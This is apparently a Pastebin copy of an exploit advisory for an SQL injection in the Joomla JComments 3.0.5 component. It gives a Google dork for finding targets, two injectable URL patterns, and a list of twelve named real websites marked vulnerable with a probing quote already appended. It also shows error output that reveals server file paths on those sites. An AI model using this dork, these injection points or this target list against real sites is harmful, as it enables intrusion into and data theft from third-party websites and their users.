Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla JComments Components 3.0.5 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/01/2019
- # Vendor Homepage : joomlatune.com
- # Software Download Link : joomlatune.com/jcomments-downloads.html
- # Software Information Link : extensions.joomla.org/extension/jcomments/
- # Software Version : 3.0.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_jcomments''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010305
- packetstormsecurity.com/files/151428/Joomla-JComments-3.0.5-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- JComments is released under the GNU GPL license and is distributed for free.
- The JComments is a powerful and easy to use AJAX based comment system
- for Joomla with flexible ACL, smiles, BBCodes and avatars support.
- ####################################################################
- # Impact :
- ***********
- Joomla JComments 3.0.5 component for Joomla! is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_jcomments&Itemid=[SQL Injection]
- /index.php?option=com_jcomments&task=rss&object_id=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] kateb.edu.af/fa/index.php?option=com_jcomments&task=rss&object_id=97%27
- [+] swalestudio.com/anime/index.php?option=com_jcomments&task=rss&object_id=292%27
- [+] kok.logipam.com/index.php?option=com_jcomments&Itemid=53%27
- [+] asesorialogistica.cl/index.php?option=com_jcomments&task=rss&object_id=81%27
- [+] coin.wne.uw.edu.pl/sledziewska/index.php?option=com_jcomments&task=rss&object_id=1%27
- [+] mail.villantomagazin.com/regi/index.php?option=com_jcomments&task=rss&object_id=1015%27
- [+] bunavestirea.md/index.php?option=com_jcomments&Itemid=53%27
- [+] agrodam.cz/hokej/index.php?option=com_jcomments&task=rss&object_id=108%27
- [+] giemmefilati.com/arcipelagomuratori/index.php?option=com_jcomments&Itemid=53%27
- [+] insightitaly.com/index.php?option=com_jcomments&Itemid=127%27
- [+] prospekt.ee/old/index.php/index.php?option=com_jcomments&task=rss&object_id=8468%27
- [+] perunaltracitta.org/listadicittadinanza/index.php?option=com_jcomments&task=rss&object_id=938%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Non-static method JLoader::import() should not be
- called statically in /home1/swalestu/public_html/anime
- /libraries/joomla/import.php on line 29
- Warning: Creating default object from empty value in
- /data05/virt18853/domeenid/www.prospekt.ee/htdocs/old/plugins
- /system/nonumberelements/helpers/parameters.php on line 130
- Deprecated: preg_replace(): The /e modifier is deprecated, use
- preg_replace_callback instead in /data05/virt18853/domeenid
- /www.prospekt.ee/htdocs/old/libraries/joomla/filter/
- filterinput.php on line 501
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment